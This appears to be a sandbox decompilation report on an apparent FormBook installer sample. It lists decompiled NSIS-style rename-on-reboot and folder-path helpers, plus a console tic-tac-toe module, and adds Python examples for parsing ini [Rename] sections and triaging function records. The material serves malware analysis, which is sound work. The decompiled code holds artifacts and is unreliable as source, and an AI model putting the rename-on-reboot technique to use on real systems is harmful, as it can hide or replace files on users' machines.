                                                                                                    • Part of subcall function 00405970: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405B7E,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004059A7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                   • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                                                                                  • String ID: %s=%s$[Rename]
                                                                                                  • API String ID: 3445103937-1727408572
                                                                                                  • Opcode ID: 1f2736941f5f4df1f680b04e7c0e89d6834b7e9bfe2f13e76cace8b15f9fd4f6
                                                                                                  • Instruction ID: 78907502291c0276e2930d03081e4e2226449f21389978f945135ad8005819bc
                                                                                                  • Opcode Fuzzy Hash: 1f2736941f5f4df1f680b04e7c0e89d6834b7e9bfe2f13e76cace8b15f9fd4f6
                                                                                                  • Instruction Fuzzy Hash: 7741F171604B057BD3206B619D49F6B3AACDF81715F100536FA41F62C2EA3CB8018EBE
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%
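The decompiled routine E00405A72 above first tries a delayed move through a resolved import and, when that fails, writes a `<new|NUL>=<existing>` line into the `[Rename]` section of an ini file, which is the rename-or-delete-at-next-boot mechanism of the wininit.ini era. Its control flow matches the rename-on-reboot routine of the open-source NSIS installer stub, an identification this page does not make. The following Python block is an added example written for this page; it is not code from the analysed sample and not the installer's own source. It re-implements the ini editing on an in-memory buffer so that it runs offline, leaves out the Win32 file handling (GetShortPathNameA, ReadFile, WriteFile), and adds a reader for the `[Rename]` section that an analyst can run over a recovered ini file. Two things the page does not show are assumed: the string at 0x409404 that is searched after the `[Rename]\r\n` header is taken to be `"\n["` (start of the next section), and the target file is taken to be a wininit.ini-style file where `NUL=<path>` means delete. The block also reproduces the byte loop at label L20 literally, because that loop copies the tail low-to-high with the destination ahead of the source and therefore overwrites bytes it has not read yet whenever the tail is longer than the rename line; the slice-based insert is the correct form.

```python
# Added example for this page: a re-implementation in Python of the rename-on-reboot
# fallback performed by the decompiled routine E00405A72. Not code from the analysed
# sample and not the installer's own source. Works on an in-memory buffer; the Win32
# file handling is left out.
#
# Assumptions not shown on this page: the string at 0x409404 searched after the
# "[Rename]\r\n" header is taken to be "\n[" (start of the next ini section), and the
# target file is taken to be a wininit.ini-style file, where "NUL=<path>" in the
# [Rename] section deletes <path> at the next boot.
from __future__ import annotations

RENAME_SECTION = b"[Rename]\r\n"   # literal visible in the decompiled code (0xa bytes)
NEXT_SECTION = b"\n["              # assumed content of the string at 0x409404


def build_rename_line(existing: bytes, new: bytes | None) -> bytes:
    """wsprintfA("%s=%s\\r\\n", destination, existing). The routine pre-fills the
    destination buffer with "NUL" (the DWORD 0x4c554e) and only replaces it when a
    new name is given, so a missing new name produces a delete entry."""
    return (new if new is not None else b"NUL") + b"=" + existing + b"\r\n"


def find_insert_point(ini: bytes) -> tuple[bytes, int]:
    """Return (buffer, offset) for the new line, following the decompiled control flow:
    no [Rename] section: append the header, insert at the new end (label L13);
    section present but nothing after it: insert at end of data (L13);
    section followed by another "[...]": insert at that '[' (the _t28 + 1 at L21)."""
    pos = ini.find(RENAME_SECTION)
    if pos < 0:
        ini = ini + RENAME_SECTION
        return ini, len(ini)
    nxt = ini.find(NEXT_SECTION, pos + len(RENAME_SECTION))
    if nxt < 0:
        return ini, len(ini)
    return ini, nxt + 1


def insert_rename_line(ini: bytes, line: bytes) -> bytes:
    """Insert with a slice copy, which is safe for any tail length."""
    buf, at = find_insert_point(ini)
    return buf[:at] + line + buf[at:]


def shift_tail_as_decompiled(ini: bytes, line: bytes) -> bytes:
    """Reproduce the L20 loop literally: p[n] = *p; p++ while p < end, with n equal to
    the rename line length, then copy the line in at the insertion point. The copy
    runs low to high with the destination n bytes ahead of the source, so from the
    n-th byte on it reads bytes it has already overwritten. The result is correct
    only when the tail after the insertion point is at most n bytes long."""
    buf, at = find_insert_point(ini)
    n = len(line)
    end = len(buf)
    work = bytearray(buf) + bytearray(n)   # GlobalAlloc(file size + line length [+ header])
    p = at
    while p < end:
        work[p + n] = work[p]
        p += 1
    work[at:at + n] = line
    return bytes(work)


def parse_rename_section(ini: bytes) -> list[tuple[bytes, bytes]]:
    """Read back (destination, source) pairs from the [Rename] section, the view an
    analyst wants when checking what a sample has scheduled for the next boot; a
    destination of b"NUL" means delete."""
    out: list[tuple[bytes, bytes]] = []
    inside = False
    for raw in ini.split(b"\n"):
        entry = raw.rstrip(b"\r")
        if entry.startswith(b"["):
            inside = entry == b"[Rename]"
            continue
        if inside and b"=" in entry:
            dst, src = entry.split(b"=", 1)
            out.append((dst, src))
    return out


# Constructed sample ini content, not taken from the report.
SAMPLE_INI = (
    b"[Rename]\r\n"
    b"NUL=C:\\OLD.TMP\r\n"
    b"[Other]\r\n"
    b"key=value\r\n"
)

if __name__ == "__main__":
    line = build_rename_line(b"C:\\TEMP\\A.TMP", None)
    updated = insert_rename_line(SAMPLE_INI, line)
    for dst, src in parse_rename_section(updated):
        print("delete" if dst == b"NUL" else "rename to " + dst.decode(), src.decode())
    # The literal byte loop corrupts this sample: its 20-byte tail is longer than
    # the 19-byte rename line.
    print("literal loop matches slice insert:",
          shift_tail_as_decompiled(SAMPLE_INI, line) == updated)
```

Running the block shows the two delete entries an analyst would recover from the sample ini, and prints `False` for the comparison because the `[Other]` tail in the constructed sample is one byte longer than the rename line; on a file where `[Rename]` is the last section, which is the common case, both paths agree.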

                                                                                                  C-Code - Quality: 66%
                                                                                                   			E100013F0(signed int __ecx) {                  // console game turn handler from the module mapped at 0x10000000; recursive, and the listing below is cut off by the page
                                                                                                   				signed int _v8;
                                                                                                   				void* _t16;
                                                                                                   				signed int _t17;
                                                                                                   				signed int _t18;
                                                                                                   				signed int _t21;
                                                                                                   				signed int _t26;
                                                                                                   				signed int _t40;
                                                                                                   				signed int _t42;
                                                                                                   				void* _t44;
                                                                                                   				void* _t45;
                                                                                                   
                                                                                                   				_t39 = __ecx;                                     // _t39 is not declared above (decompiler artifact)
                                                                                                   				_push(__ecx);
                                                                                                   				if( *0x10003028 > 9) {                            // move counter: more than 9 moves on a 3x3 board means a draw
                                                                                                   					0x10004b24->X = 0x14001e;                      // COORD packed into a DWORD: X = 0x1e (30), Y = 0x14 (20)
                                                                                                   					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0x10004b24->X);   // 0xfffffff5 == STD_OUTPUT_HANDLE (-11)
                                                                                                   					_push("Game Draw");
                                                                                                   					L2:
                                                                                                   					E10001690();                                   // printf-like output of the pushed string
                                                                                                   					_t44 = _t44 + 4;
                                                                                                   					__imp___getch();                               // wait for a key, then terminate
                                                                                                   					exit(0);
                                                                                                   				}
                                                                                                   				E10001140();                                      // board redraw (body not shown)
                                                                                                   				0x10004b24->X = 0x12001e;                         // X = 30, Y = 18
                                                                                                   				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0x10004b24->X);
                                                                                                   				E10001690("Your Turn :> ", _t42);
                                                                                                   				E10001750("%d",  &_v8);                           // scanf-like read of the chosen cell index
                                                                                                   				_t42 = _v8;
                                                                                                   				_t45 = _t44 + 0xc;
                                                                                                   				if( *(0x10003000 + _t42 * 4) != 2) {              // int board at 0x10003000, 2 == free cell; the index from the user is used without a range check
                                                                                                   					E100013F0(_t39);                               // cell taken: prompt again by recursing
                                                                                                   					_t42 = _v8;
                                                                                                   				}
                                                                                                   				_t16 = E10001530( *0x10004b3c);                   // value the chosen cell is compared against (callee not shown)
                                                                                                   				_t40 =  *0x10003028; // 0x1
                                                                                                   				_t44 = _t45 + 4;
                                                                                                   				_t17 = _t40;
                                                                                                   				if(_t42 == _t16) {
                                                                                                   					_t26 = _t17 & 0x80000001;                      // signed parity of the move counter
                                                                                                   					if(_t26 < 0) {
                                                                                                   						_t26 = (_t26 - 0x00000001 | 0xfffffffe) + 1;
                                                                                                   					}
                                                                                                   					asm("sbb eax, eax");                           // branch-free select: 0 or -1 from the parity
                                                                                                   					_t39 = _t40 + 1;
                                                                                                   					 *0x10003028 = _t40 + 1;                       // advance the move counter
                                                                                                   					 *(0x10003000 + _t42 * 4) = ( ~_t26 & 0xfffffffe) + 5;   // mark the cell with 3 or 5 depending on the parity
                                                                                                   					E10001140();
                                                                                                   					0x10004b24->X = 0x14001e;                      // X = 30, Y = 20
                                                                                                   					SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0x10004b24);
                                                                                                   					_push("Player Wins");
                                                                                                   					goto L2;
                                                                                                  				}
                                                                                                  				_t18 = _t17 & 0x80000001;
                                                                                                  				__eflags = _t18;
                                                                                                  				if(_t18 < 0) {
                                                                                                  					_t18 = (_t18 - 0x00000001 | 0xfffffffe) + 1;
                                                                                                  					__eflags = _t18;
                                                                                                  				}
                                                                                                  				asm("sbb eax, eax");
                                                                                                  				 *0x10003028 = _t40 + 1;
                                                                                                  				_t21 = ( ~_t18 & 0xfffffffe) + 5;
                                                                                                  				__eflags = _t21;
                                                                                                  				 *(0x10003000 + _t42 * 4) = _t21;
                                                                                                  				E10001140();
                                                                                                  				return E10001780(__eflags);
                                                                                                  			}













Listing address column (detached from the code lines above): 0x100013f0 to 0x1000152a

APIs
• GetStdHandle.KERNEL32(000000F5,?,?,100013E5), ref: 1000140F
• SetConsoleCursorPosition.KERNEL32(00000000,?,?,100013E5), ref: 10001416
• _printf.MSPDB140-MSVCRT ref: 10001421
• _getch.MSVCRT ref: 10001429
• exit.MSVCRT ref: 10001431
• GetStdHandle.KERNEL32(000000F5,?,?,?,100013E5), ref: 1000144F
• SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,100013E5), ref: 10001456
• _printf.MSPDB140-MSVCRT ref: 10001461
• GetStdHandle.KERNEL32(000000F5,?,?,?,100013E5), ref: 100014E1
• SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,100013E5), ref: 100014E8
Memory Dump Source
• Source File: 00000002.00000002.235460951.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000002.00000002.235453419.0000000010000000.00000002.00020000.sdmp
• Associated: 00000002.00000002.235467539.0000000010002000.00000002.00020000.sdmp
• Associated: 00000002.00000002.235472130.0000000010003000.00000040.00020000.sdmp
• Associated: 00000002.00000002.235488746.0000000010005000.00000002.00020000.sdmp
Similarity
• API ID: ConsoleCursorHandlePosition$_printf$_getchexit
• String ID: Game Draw$Player Wins$Your Turn :>
• API String ID: 1169941056-2104098960
• Opcode ID: c7c91d8cf9948d624a7cac9d628c288ba56032466b15ea77a0d48c50d88a4a73
• Instruction ID: bb798e52d5f0db548a3259760b61d7a88d8b66ae99ac6efbd1eb77fd75214514
• Opcode Fuzzy Hash: c7c91d8cf9948d624a7cac9d628c288ba56032466b15ea77a0d48c50d88a4a73
• Instruction Fuzzy Hash: 88218076810224EBF7159FB4CE8A6CA3B68EB093E2B104315F226C61BEDB75D444C726
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 70%
E10001330(signed int __ecx) {
	char _v8;
	void* _t12;
	void* _t14;

	_t18 = __ecx;
	system("cls");
	E10001690("\n--------MENU--------", __ecx);
	E10001690();
	E10001690("\n2 : Play with O", "\n1 : Play with X");
	E10001690();
	E10001690("\nEnter your choice:>", "\n3 : Exit");
	E10001750("%d",  &_v8);
	 *0x10003028 = 1;
	_t12 = _v8 - 1;
	if(_t12 == 0) {
		 *0x10004b3c = 1;
		 *0x10004b38 = 0;
		return E100013F0(_t18);
	} else {
		_t14 = _t12 - 1;
		if(_t14 == 0) {
			L5:
			 *0x10004b3c = 0;
			 *0x10004b38 = 1;
			return E10001780(__eflags);
		} else {
			if(_t14 == 1) {
				exit(1);
				goto L5;
			} else {
				return E10001330(_t18);
			}
		}
	}
}

Listing address column (detached from the code lines above): 0x10001330 to 0x100013e8

Memory Dump Source
• Source File: 00000002.00000002.235460951.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000002.00000002.235453419.0000000010000000.00000002.00020000.sdmp
• Associated: 00000002.00000002.235467539.0000000010002000.00000002.00020000.sdmp
• Associated: 00000002.00000002.235472130.0000000010003000.00000040.00020000.sdmp
• Associated: 00000002.00000002.235488746.0000000010005000.00000002.00020000.sdmp
Similarity
• API ID: _printf$exitsystem
• String ID: --------MENU--------$1 : Play with X$2 : Play with O$3 : Exit$Enter your choice:>$cls
• API String ID: 317515175-593122841
• Opcode ID: 1c730f27932e051611968cb00b1b8b287e8b76facbc99f0d8d8db95d763b031b
• Instruction ID: c53e1086591d60f6b1cfeec43a50231095aba2133065e645928d40a036651717
• Opcode Fuzzy Hash: 1c730f27932e051611968cb00b1b8b287e8b76facbc99f0d8d8db95d763b031b
• Instruction Fuzzy Hash: 730162B9846204ABF301EFE58C9A7EA77ACDB013C5F008144F90D5565ECB73A71487AA
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 36%
E10001140() {
	short _t3;
	intOrPtr _t13;
	short _t16;
	signed int _t17;
	void* _t18;
	void* _t20;

	_t3 = 0x23;
	_t16 = 9;
	do {
		0x10004b24->X = _t3;
		 *0x10004b26 = _t16;
		SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0x10004b24->X);
		_push("|       |");
		E10001690();
		_t16 = _t16 + 1;
		_t18 = _t18 + 4;
		_t3 = 0x23;
	} while (_t16 < 0x11);
	0x10004b24->X = 0xb001c;
	SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0x10004b24->X);
	E10001690();
	0x10004b24->X = 0xe001c;
	SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0x10004b24);
	E10001690("-----------------------", "-----------------------");
	_t20 = _t18 + 8;
	_t17 = 1;
	do {
		_t13 =  *((intOrPtr*)(0x10003000 + _t17 * 4));
		if(_t13 != 3) {
			if(_t13 == 5) {
				_push(_t17);
				_push(0x4f);
				goto L7;
			}
		} else {
			_push(_t17);
			_push(0x58);
			L7:
			_t13 = E100016C0();
			_t20 = _t20 + 8;
		}
		_t17 = _t17 + 1;
	} while (_t17 < 0xa);
	return _t13;
}

Listing address column (detached from the code lines above): 0x10001147 to 0x100011f9
                                                                                                  0x100011f9
                                                                                                  0x100011fe
                                                                                                  0x100011fe
                                                                                                  0x10001201
                                                                                                  0x10001202
                                                                                                  0x1000120a

                                                                                                  APIs
                                                                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,1000143D,?,?,?,100013E5), ref: 10001175
                                                                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,1000143D,?,?,?,100013E5), ref: 10001178
                                                                                                  • _printf.MSPDB140-MSVCRT ref: 1000117F
                                                                                                  • GetStdHandle.KERNEL32(000000F5,100013E5), ref: 100011A4
                                                                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 100011A7
                                                                                                  • _printf.MSPDB140-MSVCRT ref: 100011AE
                                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 100011C8
                                                                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 100011CB
                                                                                                  • _printf.MSPDB140-MSVCRT ref: 100011D2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.235460951.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.235453419.0000000010000000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.235467539.0000000010002000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.235472130.0000000010003000.00000040.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.235488746.0000000010005000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleCursorHandlePosition_printf
                                                                                                  • String ID: -----------------------$-----------------------$| |
                                                                                                  • API String ID: 1663292651-3813270350
                                                                                                  • Opcode ID: 5895f20bdd4262a172f28bb76886125ef7f415be6b547757560fce57a2e2be27
                                                                                                  • Instruction ID: 620ce55c2a8674103cdc61108c456ab59311865f7ca033f5c70fdabedfbe9187
                                                                                                  • Opcode Fuzzy Hash: 5895f20bdd4262a172f28bb76886125ef7f415be6b547757560fce57a2e2be27
                                                                                                  • Instruction Fuzzy Hash: 1B116BF6901170ABF610EB959DC5FC73A9CDB493E1F160120F614932BADB75D800866A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 74%
                                                                                                  			E00405D46(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                                                                  				signed int _v8;
                                                                                                  				struct _ITEMIDLIST* _v12;
                                                                                                  				signed int _v16;
                                                                                                  				signed char _v20;
                                                                                                  				signed int _v24;
                                                                                                  				signed char _v28;
                                                                                                  				signed int _t36;
                                                                                                  				CHAR* _t37;
                                                                                                  				signed int _t39;
                                                                                                  				int _t40;
                                                                                                  				char _t50;
                                                                                                  				char _t51;
                                                                                                  				char _t53;
                                                                                                  				char _t55;
                                                                                                  				void* _t63;
                                                                                                  				signed int _t69;
                                                                                                  				signed int _t74;
                                                                                                  				signed int _t75;
                                                                                                  				intOrPtr _t79;
                                                                                                  				char _t83;
                                                                                                  				void* _t85;
                                                                                                  				CHAR* _t86;
                                                                                                  				void* _t88;
                                                                                                  				signed int _t95;
                                                                                                  				signed int _t97;
                                                                                                  				void* _t98;
                                                                                                  
                                                                                                  				_t88 = __esi;
                                                                                                  				_t85 = __edi;
                                                                                                  				_t63 = __ebx;
                                                                                                  				_t36 = _a8;
                                                                                                  				if(_t36 < 0) {
                                                                                                  					_t79 =  *0x7a1f7c; // 0x891203
                                                                                                  					_t36 =  *(_t79 - 4 + _t36 * 4);
                                                                                                  				}
                                                                                                  				_t74 =  *0x7a27d8 + _t36;
                                                                                                  				_t37 = 0x7a1740;
                                                                                                  				_push(_t63);
                                                                                                  				_push(_t88);
                                                                                                  				_push(_t85);
                                                                                                  				_t86 = 0x7a1740;
                                                                                                  				if(_a4 - 0x7a1740 < 0x800) {
                                                                                                  					_t86 = _a4;
                                                                                                  					_a4 = _a4 & 0x00000000;
                                                                                                  				}
                                                                                                  				while(1) {
                                                                                                  					_t83 =  *_t74;
                                                                                                  					if(_t83 == 0) {
                                                                                                  						break;
                                                                                                  					}
                                                                                                  					__eflags = _t86 - _t37 - 0x400;
                                                                                                  					if(_t86 - _t37 >= 0x400) {
                                                                                                  						break;
                                                                                                  					}
                                                                                                  					_t74 = _t74 + 1;
                                                                                                  					__eflags = _t83 - 0xfc;
                                                                                                  					_a8 = _t74;
                                                                                                  					if(__eflags <= 0) {
                                                                                                  						if(__eflags != 0) {
                                                                                                  							 *_t86 = _t83;
                                                                                                  							_t86 =  &(_t86[1]);
                                                                                                  							__eflags = _t86;
                                                                                                  						} else {
                                                                                                  							 *_t86 =  *_t74;
                                                                                                  							_t86 =  &(_t86[1]);
                                                                                                  							_t74 = _t74 + 1;
                                                                                                  						}
                                                                                                  						continue;
                                                                                                  					}
                                                                                                  					_t39 =  *(_t74 + 1);
                                                                                                  					_t75 =  *_t74;
                                                                                                  					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
                                                                                                  					_a8 = _a8 + 2;
                                                                                                  					_v28 = _t75 | 0x00000080;
                                                                                                  					_t69 = _t75;
                                                                                                  					_v24 = _t69;
                                                                                                  					__eflags = _t83 - 0xfe;
                                                                                                  					_v20 = _t39 | 0x00000080;
                                                                                                  					_v16 = _t39;
                                                                                                  					if(_t83 != 0xfe) {
                                                                                                  						__eflags = _t83 - 0xfd;
                                                                                                  						if(_t83 != 0xfd) {
                                                                                                  							__eflags = _t83 - 0xff;
                                                                                                  							if(_t83 == 0xff) {
                                                                                                  								__eflags = (_t39 | 0xffffffff) - _t95;
                                                                                                  								E00405D46(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
                                                                                                  							}
                                                                                                  							L41:
                                                                                                  							_t40 = lstrlenA(_t86);
                                                                                                  							_t74 = _a8;
                                                                                                  							_t86 =  &(_t86[_t40]);
                                                                                                  							_t37 = 0x7a1740;
                                                                                                  							continue;
                                                                                                  						}
                                                                                                  						__eflags = _t95 - 0x1d;
                                                                                                  						if(_t95 != 0x1d) {
                                                                                                  							__eflags = (_t95 << 0xa) + 0x7a3000;
                                                                                                  							E00405D24(_t86, (_t95 << 0xa) + 0x7a3000);
                                                                                                  						} else {
                                                                                                  							E00405C82(_t86,  *0x7a27a8);
                                                                                                  						}
                                                                                                  						__eflags = _t95 + 0xffffffeb - 7;
                                                                                                  						if(_t95 + 0xffffffeb < 7) {
                                                                                                  							L32:
                                                                                                  							E00405F86(_t86);
                                                                                                  						}
                                                                                                  						goto L41;
                                                                                                  					}
                                                                                                  					_t97 = 2;
                                                                                                  					_t50 = GetVersion();
                                                                                                  					__eflags = _t50;
                                                                                                  					if(_t50 >= 0) {
                                                                                                  						L12:
                                                                                                  						_v8 = 1;
                                                                                                  						L13:
                                                                                                  						__eflags =  *0x7a2824;
                                                                                                  						if( *0x7a2824 != 0) {
                                                                                                  							_t97 = 4;
                                                                                                  						}
                                                                                                  						__eflags = _t69;
                                                                                                  						if(_t69 >= 0) {
                                                                                                  							__eflags = _t69 - 0x25;
                                                                                                  							if(_t69 != 0x25) {
                                                                                                  								__eflags = _t69 - 0x24;
                                                                                                  								if(_t69 == 0x24) {
                                                                                                  									GetWindowsDirectoryA(_t86, 0x400);
                                                                                                  									_t97 = 0;
                                                                                                  								}
                                                                                                  								while(1) {
                                                                                                  									__eflags = _t97;
                                                                                                  									if(_t97 == 0) {
                                                                                                  										goto L29;
                                                                                                  									}
                                                                                                  									_t51 =  *0x7a27a4;
                                                                                                  									_t97 = _t97 - 1;
                                                                                                  									__eflags = _t51;
                                                                                                  									if(_t51 == 0) {
                                                                                                  										L25:
                                                                                                  										_t53 = SHGetSpecialFolderLocation( *0x7a27a8,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
                                                                                                  										__eflags = _t53;
                                                                                                  										if(_t53 != 0) {
                                                                                                  											L27:
                                                                                                  											 *_t86 =  *_t86 & 0x00000000;
                                                                                                  											__eflags =  *_t86;
                                                                                                  											continue;
                                                                                                  										}
                                                                                                  										__imp__SHGetPathFromIDListA(_v12, _t86);
                                                                                                  										__imp__CoTaskMemFree(_v12);
                                                                                                  										__eflags = _t53;
                                                                                                  										if(_t53 != 0) {
                                                                                                  											goto L29;
                                                                                                  										}
                                                                                                  										goto L27;
                                                                                                  									}
                                                                                                  									__eflags = _v8;
                                                                                                  									if(_v8 == 0) {
                                                                                                  										goto L25;
                                                                                                  									}
                                                                                                  									_t55 =  *_t51( *0x7a27a8,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
                                                                                                  									__eflags = _t55;
                                                                                                  									if(_t55 == 0) {
                                                                                                  										goto L29;
                                                                                                  									}
                                                                                                  									goto L25;
                                                                                                  								}
                                                                                                  								goto L29;
                                                                                                  							}
                                                                                                  							GetSystemDirectoryA(_t86, 0x400);
                                                                                                  							goto L29;
                                                                                                  						} else {
                                                                                                  							_t72 = (_t69 & 0x0000003f) +  *0x7a27d8;
                                                                                                  							E00405C0B(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x7a27d8, _t86, _t69 & 0x00000040);
                                                                                                  							__eflags =  *_t86;
                                                                                                  							if( *_t86 != 0) {
                                                                                                  								L30:
                                                                                                  								__eflags = _v16 - 0x1a;
                                                                                                  								if(_v16 == 0x1a) {
                                                                                                  									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                                  								}
                                                                                                  								goto L32;
                                                                                                  							}
                                                                                                  							E00405D46(_t72, _t86, _t97, _t86, _v16);
                                                                                                  							L29:
                                                                                                  							__eflags =  *_t86;
                                                                                                  							if( *_t86 == 0) {
                                                                                                  								goto L32;
                                                                                                  							}
                                                                                                  							goto L30;
                                                                                                  						}
                                                                                                  					}
                                                                                                  					__eflags = _t50 - 0x5a04;
                                                                                                  					if(_t50 == 0x5a04) {
                                                                                                  						goto L12;
                                                                                                  					}
                                                                                                  					__eflags = _v16 - 0x23;
                                                                                                  					if(_v16 == 0x23) {
                                                                                                  						goto L12;
                                                                                                  					}
                                                                                                  					__eflags = _v16 - 0x2e;
                                                                                                  					if(_v16 == 0x2e) {
                                                                                                  						goto L12;
                                                                                                  					} else {
                                                                                                  						_v8 = _v8 & 0x00000000;
                                                                                                  						goto L13;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				 *_t86 =  *_t86 & 0x00000000;
                                                                                                  				if(_a4 == 0) {
                                                                                                  					return _t37;
                                                                                                  				}
                                                                                                  				return E00405D24(_a4, _t37);
                                                                                                  			}






























                                                                                                  APIs
                                                                                                  • GetVersion.KERNEL32(?,0079E578,00000000,00405048,0079E578,00000000), ref: 00405DEE
                                                                                                  • GetSystemDirectoryA.KERNEL32 ref: 00405E69
                                                                                                  • GetWindowsDirectoryA.KERNEL32(HfkcdoekxlzOjbt,00000400), ref: 00405E7C
                                                                                                  • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405EB8
                                                                                                  • SHGetPathFromIDListA.SHELL32(00000000,HfkcdoekxlzOjbt), ref: 00405EC6
                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00405ED1
                                                                                                  • lstrcatA.KERNEL32(HfkcdoekxlzOjbt,\Microsoft\Internet Explorer\Quick Launch), ref: 00405EF3
                                                                                                  • lstrlenA.KERNEL32(HfkcdoekxlzOjbt,?,0079E578,00000000,00405048,0079E578,00000000), ref: 00405F45
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
• Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                  • String ID: HfkcdoekxlzOjbt$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                  • API String ID: 900638850-914065445
                                                                                                  • Opcode ID: 9a7fc9aa2756331657853379cb9517c1fa59f60044e7e7e8b42bc65ab8194b8b
                                                                                                  • Instruction ID: f3379658f76e61b6bf464943ca4455bb4baefa90c5fe634512cd2817f5000309
                                                                                                  • Opcode Fuzzy Hash: 9a7fc9aa2756331657853379cb9517c1fa59f60044e7e7e8b42bc65ab8194b8b
                                                                                                  • Instruction Fuzzy Hash: 3251E531904A05ABDF219B28CC8877F3BA4EB56714F14823BE551BA2D1D33C4A42DF9E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%
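The API list and String ID line above are the quickest way to tell installer-runtime boilerplate from payload logic: the GetVersion / GetSystemDirectoryA / SHGetSpecialFolderLocation / SHGetPathFromIDListA / CoTaskMemFree / lstrcatA combination with the literal "\Microsoft\Internet Explorer\Quick Launch" is the shape of a special-folder path resolver, not of FormBook's injection or C2 code, so an analyst can skip this function and move on. The following is an added example, not part of the Joe Sandbox report or of the sample: it parses one function record in exactly the bullet format shown above into an API/string profile, records the call-site addresses, and matches the profile against an allowlist of helper signatures. The allowlist (`INSTALLER_RUNTIME_HELPERS`) and the function names are assumptions made for the example; the sample record is copied from the lines above.

```python
"""Triage helper for Joe Sandbox decompiler function records (added example).

Parses the 'APIs' bullet list and the 'String ID' line of one function record,
builds an API/string profile and matches it against an analyst-maintained
allowlist of installer-runtime helpers. The allowlist below is an assumption
for this example, not something the report emits.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# One bullet per call site:  "• lstrcatA.KERNEL32(arg,arg), ref: 00405EF3"
# or, with no argument list:  "• GetSystemDirectoryA.KERNEL32 ref: 00405E69"
API_LINE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
STRING_ID_LINE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*)$")
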